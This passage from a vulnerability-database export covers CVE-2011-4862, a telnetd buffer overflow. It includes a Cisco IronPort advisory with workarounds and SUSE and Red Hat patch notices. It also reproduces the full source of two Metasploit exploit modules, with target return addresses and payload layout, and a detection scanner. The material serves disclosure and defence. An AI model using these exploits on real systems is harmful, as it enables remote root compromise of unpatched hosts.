reference only.\r\n\r\nVulnerability Scoring Details\r\n=============================\r\n\r\nCisco has scored the vulnerability in this advisory based on the\r\nCommon Vulnerability Scoring System (CVSS). The CVSS scoring in this\r\nsecurity advisory is in accordance with CVSS version 2.0.\r\n\r\nCVSS is a standards-based scoring method that conveys vulnerability\r\nseverity and helps organizations determine the urgency and priority\r\nof a response.\r\n\r\nCisco has provided a base and temporal score. Customers can also\r\ncompute environmental scores that help determine the impact of the\r\nvulnerability in their own networks.\r\n\r\nCisco has provided additional information regarding CVSS at the\r\nfollowing link:\r\n\r\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\r\n\r\nCisco has also provided a CVSS calculator to compute the\r\nenvironmental impact for individual networks at the following link:\r\n\r\nhttp://intellishield.cisco.com/security/alertmanager/cvss\r\n\r\n\r\n* CVE-2011-4862/Ironport #83262 ("Telnetd encrypt_keyid vulnerability")\r\n\r\nCVSS Base Score - 10.0\r\n Access Vector - Network\r\n Access Complexity - Low\r\n Authentication - None\r\n Confidentiality Impact - Complete\r\n Integrity Impact - Complete\r\n Availability Impact - Complete\r\n\r\nCVSS Temporal Score - 9.0\r\n Exploitability - Functional\r\n Remediation Level - Workaround\r\n Report Confidence - Confirmed\r\n\r\n\r\nImpact\r\n======\r\n\r\nSuccessful exploitation of this vulnerability could allow a remote,\r\nunauthenticated attacker to execute arbitrary code with elevated\r\nprivileges.\r\n\r\nSoftware Versions and Fixes\r\n===========================\r\n\r\nFixes for the vulnerability described in this advisory are not yet\r\navailable; however, there are configuration workarounds available\r\nthat may eliminate the risk for most customers. Please see the\r\nWorkarounds section of this advisory for information on the\r\nmitigation of this vulnerability.\r\n\r\nCisco IronPort Email Security Appliance (C-Series and X-Series)\r\nversions prior to 7.6.0 are affected. Version 7.6.0 will include\r\nfixes for this issue when available.\r\n\r\nCisco IronPort Security Management Appliance (M-Series) versions\r\nprior to 7.8.0 are affected. Versions 7.8.0 and 7.9.0 will include\r\nfixes for this issue when available.\r\n\r\nWorkarounds\r\n===========\r\n\r\nBy default, Telnet is configured on the Management port. Telnet\r\nservices can be disabled to mitigate this vulnerability.\r\nAdministrators can disable Telnet by using the administration\r\ngraphical user interface (GUI) or by using the "interfaceconfig"\r\ncommand in the command-line interface (CLI). As a security best\r\npractice, customers should use Secure Shell (SSH) instead of Telnet.\r\n\r\nComplete the following steps to disable Telnet via the GUI:\r\n\r\nStep 1: Navigate to Network > IP Interfaces > interface_name.\r\n\r\nStep 2: Remove the check from the box next to the Telnet service.\r\n\r\nStep 3: Click on the Submit button to submit the change.\r\n\r\nStep 4: Click the Commit Change button for these changes to take effect.\r\n\r\nUse the "interfaceconfig" command, as shown in the example below to\r\ndisable Telnet via the CLI.\r\n\r\n+-----------------------------------------------------------\r\nmail3.example.com> interfaceconfig\r\n\r\n\r\nCurrently configured interfaces:\r\n1. Data 1 (192.168.1.1/24 on Data1: mail3.example.com)\r\n2. Data 2 (192.168.2.1/24 on Data2: mail3.example.com)\r\n3. Management (192.168.42.42/24 on Management: mail3.example.com)\r\n \r\nChoose the operation you want to perform:\r\n - NEW - Create a new interface.\r\n - EDIT - Modify an interface.\r\n - GROUPS - Define interface groups.\r\n - DELETE - Remove an interface.\r\n \r\n[]> edit\r\n\r\n\r\nEnter the number of the interface you wish to edit.\r\n[]> 3\r\n\r\n<output omitted>\r\n\r\nDo you want to enable Telnet on this interface? [N]> N\r\nDo you want to enable SSH on this interface? [N]> Y\r\n+-----------------------------------------------------------\r\n\r\n\r\nNote: The "interfaceconfig" command is described in detail in the\r\nsection "Other Tasks in the GUI" in the Cisco IronPort AsyncOS Daily\r\nManagement Guide available at the following link:\r\n\r\nhttp://www.cisco.com/en/US/docs/security/esa/esa7.5/ESA_7.5_Daily_Management_Guide.pdf\r\n\r\nObtaining Fixed Software\r\n========================\r\n\r\nCisco Ironport has not yet released software updates that address\r\nthis vulnerability. The affected products in this advisory are\r\ndirectly supported by Cisco IronPort. Customers should contact Cisco\r\nIronPort technical support at the link below to obtain software\r\nfixes. Cisco IronPort technical support can assist customers in\r\ndetermining the correct fixes and installation procedures. Customers\r\nshould direct all warranty questions to Cisco IronPort technical\r\nsupport.\r\n\r\nNote: Do not contact psirt@cisco.com or security-alert@cisco.com for\r\nsoftware upgrades.\r\n\r\nhttp://www.ironport.com/support/contact_support.html\r\n\r\nCustomers with Service Contracts\r\n+-------------------------------\r\n\r\nCustomers with contracts should obtain upgraded software through their\r\nregular update channels. For most customers, upgrades should be obtained\r\nthrough the Software Center on Cisco.com at http://www.cisco.com.\r\n\r\nCustomers Using Third-Party Support Organizations\r\n+------------------------------------------------\r\n\r\nCustomers with Cisco products that are provided or maintained through\r\nprior or existing agreements with third-party support organizations,\r\nsuch as Cisco Partners, authorized resellers, or service providers,\r\nshould contact that organization for assistance with the appropriate\r\ncourse of action.\r\n\r\nThe effectiveness of any workaround or fix depends on specific\r\ncustomer situations, such as product mix, network topology, traffic\r\nbehavior, and organizational mission. Because of the variety of\r\naffected products and releases, customers should consult their\r\nservice providers or support organizations to ensure that any applied\r\nworkaround or fix is the most appropriate in the intended network\r\nbefore it is deployed.\r\n\r\nCustomers Without Service Contracts\r\n+----------------------------------\r\n\r\nCustomers who purchase directly from Cisco but do not hold a Cisco\r\nservice contract and customers who make purchases through third-party\r\nvendors but are unsuccessful in obtaining fixed software through\r\ntheir point of sale should obtain upgrades by contacting the Cisco\r\nTechnical Assistance Center (TAC):\r\n\r\n * +1 800 553 2447 (toll free from within North America)\r\n * +1 408 526 7209 (toll call from anywhere in the world)\r\n * e-mail: tac@cisco.com\r\n\r\nCustomers should have the product serial number available and be\r\nprepared to provide the URL of this advisory as evidence of\r\nentitlement to a free upgrade. Customers without service contracts\r\nshould request free upgrades through the TAC.\r\n\r\nRefer to Cisco Worldwide Contacts at\r\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\r\nfor additional TAC contact information, including localized telephone\r\nnumbers, instructions, and e-mail addresses for support in various\r\nlanguages.\r\n\r\nExploitation and Public Announcements\r\n=====================================\r\n\r\nThe vulnerability in the telnetd service that affects these Cisco\r\nIronPort appliances was publicly disclosed by the FreeBSD Project on\r\nDecember 23rd, 2011. The FreeBSD Project advisory is available at: \r\n\r\nhttp://security.freebsd.org/advisories/FreeBSD-SA-11:08.telnetd.asc\r\n \r\nThe Cisco Product Security Incident Response Team (PSIRT) is aware of\r\nexploit modules for the Metasploit Framework that can exploit this\r\nvulnerability on affected Cisco IronPort appliances.\r\n\r\nStatus of This Notice: Interim\r\n==============================\r\n\r\nTHIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY\r\nKIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME. CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW\r\nINFORMATION BECOMES AVAILABLE.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that\r\nomits the distribution URL in the following section is an\r\nuncontrolled copy, and may lack important information or contain\r\nfactual errors.\r\n\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco Security Intelligence Operations at\r\nthe following link:\r\n\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\r\n\r\nAdditionally, a text version of this advisory is clear signed with\r\nthe Cisco PSIRT PGP key and circulated among the following e-mail\r\naddresses:\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n\r\nFuture updates of this advisory, if any, will reside on Cisco.com but\r\nmay not be announced on mailing lists. Users can monitor this\r\nadvisory's URL for any updates.\r\n\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2012-January-26 | Initial public release. |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information about reporting security vulnerabilities in Cisco\r\nproducts, obtaining assistance with security incidents, and registering\r\nto receive security information from Cisco is available on Cisco.com at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis web page includes instructions for press inquiries\r\nregarding Cisco Security Advisories. All Cisco Security Advisories are\r\navailable at http://www.cisco.com/go/psirt.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.11 (GNU/Linux)\r\n\r\niF4EAREIAAYFAk8hkcgACgkQQXnnBKKRMNDsEQEAgIcgfpN782STBUSoeNscHx7y\r\nalfW8QN3Z7EBYwJQ2RMA+gKs/s2JNwwOlA0zkOxx0joHod23SwlqApMZS/Qb3nps\r\n=Jl0R\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-30T00:00:00", "published": "2012-01-30T00:00:00", "id": "SECURITYVULNS:DOC:27599", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27599", "title": "Cisco Security Advisory: Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T12:19:38", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This update of heimdal fixes one security issues:\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. (This only affects the\n ktelnetd from the heimdal RPM, not the regular telnetd\n supplied by SUSE.)\n", "edition": 1, "modified": "2012-01-05T12:08:59", "published": "2012-01-05T12:08:59", "id": "SUSE-SU-2012:0024-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00031.html", "title": "Security update for heimdal (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "This update of heimdal fixes one security issues:\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. (This only affects the\n ktelnetd from the heimdal RPM, not the regular telnetd\n supplied by SUSE.)\n", "edition": 1, "modified": "2012-01-05T12:36:30", "published": "2012-01-05T12:36:30", "id": "SUSE-SU-2012:0056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00039.html", "title": "Security update for heimdal (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:49:41", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1526", "CVE-2011-4862"], "edition": 1, "description": "This update of krb5 fixes two security issues.\n\n * CVE-2011-4862: A remote code execution in the\n kerberized telnet daemon was fixed. (This only affects the\n ktelnetd from the krb5-appl RPM, not the regular telnetd\n supplied by SUSE.)\n * CVE-2011-1526 / MITKRB5-SA-2011-005: Fixed krb5 ftpd\n unauthorized file access problems.\n", "modified": "2012-01-05T12:08:41", "published": "2012-01-05T12:08:41", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00028.html", "id": "SUSE-SU-2012:0018-1", "title": "Security update for Kerberos 5 (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A \nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version of\nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled the \nkrb5 telnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-appl-server users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n", "modified": "2018-06-06T20:24:22", "published": "2011-12-27T05:00:00", "id": "RHSA-2011:1852", "href": "https://access.redhat.com/errata/RHSA-2011:1852", "type": "redhat", "title": "(RHSA-2011:1852) Critical: krb5-appl security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "Kerberos is a network authentication system which allows clients and\nservers to authenticate to each other using symmetric encryption and a\ntrusted third-party, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd).\nA remote attacker who can access the telnet port of a target machine could\nuse this flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately.\n\nAll krb5-workstation users should upgrade to these updated packages, which \ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:58:33", "published": "2011-12-28T05:00:00", "id": "RHSA-2011:1853", "href": "https://access.redhat.com/errata/RHSA-2011:1853", "type": "redhat", "title": "(RHSA-2011:1853) Critical: krb5 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:52", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "Kerberos is a network authentication system which allows clients and servers\nto authenticate to each other using symmetric encryption and a trusted third-\nparty, the Key Distribution Center (KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd). A\nremote attacker who can access the telnet port of a target machine could use\nthis flaw to execute arbitrary code as root. (CVE-2011-4862)\n\nNote that the krb5 telnet daemon is not enabled by default in any version of \nRed Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-workstation package, have enabled the\ntelnet daemon, and have it accessible remotely, this update should be\napplied immediately. \n\nAll krb5-workstation users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2017-09-08T11:51:56", "published": "2011-12-27T05:00:00", "id": "RHSA-2011:1851", "href": "https://access.redhat.com/errata/RHSA-2011:1851", "type": "redhat", "title": "(RHSA-2011:1851) Critical: krb5 security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4862"], "description": "The krb5-appl packages provide Kerberos-aware telnet, ftp, rcp, rsh, and\nrlogin clients and servers. Kerberos is a network authentication system\nwhich allows clients and servers to authenticate to each other using\nsymmetric encryption and a trusted third-party, the Key Distribution Center\n(KDC).\n\nA buffer overflow flaw was found in the MIT krb5 telnet daemon (telnetd).\nA remote attacker who can access the telnet port of a target machine could\nuse this flaw to execute arbitrary code as root. (CVE-2011-4862) \n\nNote that the krb5 telnet daemon is not enabled by default in any version\nof Red Hat Enterprise Linux. In addition, the default firewall rules block\nremote access to the telnet port. This flaw does not affect the telnet\ndaemon distributed in the telnet-server package.\n\nFor users who have installed the krb5-appl-servers package, have enabled\nthe krb5 telnet daemon, and have it accessible remotely, this update should\nbe applied immediately. \n\nAll krb5-appl-server users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\n", "modified": "2016-04-04T18:44:27", "published": "2011-12-28T05:00:00", "id": "RHSA-2011:1854", "href": "https://access.redhat.com/errata/RHSA-2011:1854", "type": "redhat", "title": "(RHSA-2011:1854) Critical: krb5-appl security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:46:53", "description": "This module exploits a buffer overflow in the encryption option handler of the Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions use NetKit-derived telnet daemons, so this flaw only applies to a small subset of Linux systems running telnetd.\n", "published": "2011-12-28T06:00:10", "type": "metasploit", "title": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/TELNET/TELNET_ENCRYPT_KEYID", "href": "", "sourceData": "# -*- coding: binary -*-\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Telnet\n include Msf::Exploit::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the encryption option handler of the\n Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions\n use NetKit-derived telnet daemons, so this flaw only applies to a small subset of\n Linux systems running telnetd.\n },\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2011-4862'],\n ['OSVDB', '78020'],\n ['BID', '51182'],\n ['EDB', '18280']\n ],\n 'Privileged' => true,\n 'Platform' => 'linux',\n 'Payload' =>\n {\n 'Space' => 200,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n },\n\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Red Hat Enterprise Linux 3 (krb5-telnet)', { 'Ret' => 0x0804b43c } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2011-12-23'))\n end\n\n def exploit_target(t)\n\n connect\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n vprint_status(banner_sanitized)\n\n enc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\n enc_keyid = \"\\xff\\xfa\\x26\\x07\"\n end_suboption = \"\\xff\\xf0\"\n\n penc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\n\n key_id = Rex::Text.rand_text_alphanumeric(400)\n\n key_id[ 0, 2] = \"\\xeb\\x76\"\n key_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\n key_id[76, 4] = [ t['Ret'] ].pack(\"V\")\n\n # Some of these bytes can get mangled, jump over them\n key_id[80,40] = \"\\x41\" * 40\n\n # Insert the real payload\n key_id[120, penc.length] = penc\n\n # Create the Key ID command\n sploit = enc_keyid + key_id + end_suboption\n\n # Initiate encryption\n sock.put(enc_init)\n\n # Wait for a successful response\n loop do\n data = sock.get_once(-1, 5) rescue nil\n if not data\n fail_with(Failure::Unknown, \"This system does not support encryption\")\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n # The first request smashes the pointer\n print_status(\"Sending first payload\")\n sock.put(sploit)\n\n # Make sure the server replied to the first request\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"Server did not respond to first payload\")\n return\n end\n\n # Some delay between each request seems necessary in some cases\n ::IO.select(nil, nil, nil, 0.5)\n\n # The second request results in the pointer being called\n print_status(\"Sending second payload...\")\n sock.put(sploit)\n handler\n\n ::IO.select(nil, nil, nil, 0.5)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/telnet/telnet_encrypt_keyid.rb"}, {"lastseen": "2020-08-20T12:43:12", "description": "This module exploits a buffer overflow in the encryption option handler of the FreeBSD telnet service.\n", "published": "2011-12-28T05:37:30", "type": "metasploit", "title": "FreeBSD Telnet Service Encryption Key ID Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/FREEBSD/TELNET/TELNET_ENCRYPT_KEYID", "href": "", "sourceData": "# -*- coding: binary -*-\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Telnet\n include Msf::Exploit::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'FreeBSD Telnet Service Encryption Key ID Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the encryption option handler of the\n FreeBSD telnet service.\n },\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry <bperry.volatile[at]gmail.com>', 'Dan Rosenberg', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2011-4862'],\n ['OSVDB', '78020'],\n ['BID', '51182'],\n ['EDB', '18280']\n ],\n 'Privileged' => true,\n 'Platform' => 'bsd',\n 'Payload' =>\n {\n 'Space' => 128,\n 'BadChars' => \"\\x00\",\n },\n\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx\n [ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx\n [ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx\n [ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx\n [ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx\n [ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx\n [ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx\n [ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx\n # [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)\n [ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return\n # Versions 5.2 and below do not support encyption\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 23 2011'))\n end\n\n def exploit_target(t)\n\n connect\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n vprint_status(banner_sanitized)\n\n enc_init = \"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\"\n enc_keyid = \"\\xff\\xfa\\x26\\x07\"\n end_suboption = \"\\xff\\xf0\"\n\n # Telnet protocol requires 0xff to be escaped with another\n penc = payload.encoded.gsub(\"\\xff\", \"\\xff\\xff\")\n\n key_id = Rex::Text.rand_text_alphanumeric(400)\n key_id[ 0, 2] = \"\\xeb\\x76\"\n key_id[72, 4] = [ t['Ret'] - 20 ].pack(\"V\")\n key_id[76, 4] = [ t['Ret'] ].pack(\"V\")\n\n # Some of these bytes can get mangled, jump over them\n key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)\n\n # Bounce to the real payload (avoid corruption)\n key_id[120, 2] = \"\\xeb\\x46\"\n\n # The actual payload\n key_id[192, penc.length] = penc\n\n # Create the Key ID command\n sploit = enc_keyid + key_id + end_suboption\n\n # Initiate encryption\n sock.put(enc_init)\n\n # Wait for a successful response\n loop do\n data = sock.get_once(-1, 5) rescue nil\n if not data\n fail_with(Failure::Unknown, \"This system does not support encryption\")\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n # The first request smashes the pointer\n print_status(\"Sending first payload\")\n sock.put(sploit)\n\n # Make sure the server replied to the first request\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"Server did not respond to first payload\")\n return\n end\n\n # Some delay between each request seems necessary in some cases\n ::IO.select(nil, nil, nil, 0.5)\n\n # The second request results in the pointer being called\n print_status(\"Sending second payload...\")\n sock.put(sploit)\n\n handler\n\n ::IO.select(nil, nil, nil, 0.5)\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb"}, {"lastseen": "2020-07-19T07:10:42", "description": "Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)\n", "published": "2011-12-27T23:50:06", "type": "metasploit", "title": "Telnet Service Encryption Key ID Overflow Detection", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4862"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/TELNET/TELNET_ENCRYPT_OVERFLOW", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'Telnet Service Encryption Key ID Overflow Detection',\n 'Description' => 'Detect telnet services vulnerable to the encrypt option Key ID overflow (BSD-derived telnetd)',\n 'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['BID', '51182'],\n ['CVE', '2011-4862'],\n ['EDB', '18280'],\n ['URL', 'https://blog.rapid7.com/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']\n ]\n )\n register_options(\n [\n Opt::RPORT(23),\n OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30])\n ])\n end\n\n def to\n return 30 if datastore['TIMEOUT'].to_i.zero?\n datastore['TIMEOUT'].to_i\n end\n\n def run_host(ip)\n begin\n ::Timeout.timeout(to) do\n res = connect\n\n # This makes db_services look a lot nicer.\n banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)\n svc = report_service(:host => rhost, :port => rport, :name => \"telnet\", :info => banner_sanitized)\n\n # Check for encryption option ( IS(0) DES_CFB64(1) )\n sock.put(\"\\xff\\xfa\\x26\\x00\\x01\\x01\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\xff\\xf0\")\n\n loop do\n data = sock.get_once(-1, to) rescue nil\n if not data\n print_status(\"#{ip}:#{rport} Does not support encryption: #{banner_sanitized} #{data.to_s.unpack(\"H*\")[0]}\")\n return\n end\n break if data.index(\"\\xff\\xfa\\x26\\x02\\x01\")\n end\n\n buff_good = \"\\xff\\xfa\\x26\" + \"\\x07\" + \"\\x00\" + (\"X\" * 63) + \"\\xff\\xf0\"\n buff_long = \"\\xff\\xfa\\x26\" + \"\\x07\" + \"\\x00\" + (\"X\" * 64) + ( \"\\xcc\" * 32) + \"\\xff\\xf0\"\n\n begin\n\n #\n # Send a long, but within boundary Key ID\n #\n sock.put(buff_good)\n data = sock.get_once(-1, 5) rescue nil\n unless data\n print_status(\"#{ip}:#{rport} UNKNOWN: No response to the initial probe: #{banner_sanitized}\")\n return\n end\n\n unless data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n #\n # First round to overwrite the function pointer itself\n #\n sock.put(buff_long)\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: No reply to first long Key ID: #{banner_sanitized}\")\n return\n end\n\n unless data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to first Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n #\n # Second round to force the function to be called\n #\n sock.put(buff_long)\n data = sock.get_once(-1, 5)\n unless data\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: No reply to second long Key ID: #{banner_sanitized}\")\n return\n end\n\n unless data.index(\"\\xff\\xfa\\x26\\x08\\xff\\xf0\")\n print_status(\"#{ip}:#{rport} UNKNOWN: Invalid reply to second Key ID: #{data.unpack(\"H*\")[0]} - #{banner_sanitized}\")\n return\n end\n\n print_status(\"#{ip}:#{rport} NOT VULNERABLE: Service did not disconnect: #{banner_sanitized}\")\n return\n\n rescue ::EOFError\n end\n\n # EOFError or response to 64-byte Key Id indicates vulnerable systems\n print_good(\"#{ip}:#{rport} VULNERABLE: #{banner_sanitized}\")\n report_vuln(\n {\n :host\t => ip,\n :service => svc,\n :name\t => self.name,\n :info\t => \"Module #{self.fullname} confirmed acceptance of a long key ID: #{banner_sanitized}\",\n :refs => self.references\n }\n )\n\n end\n rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e\n print_error(\"A network issue has occurred: #{e.message}\")\n 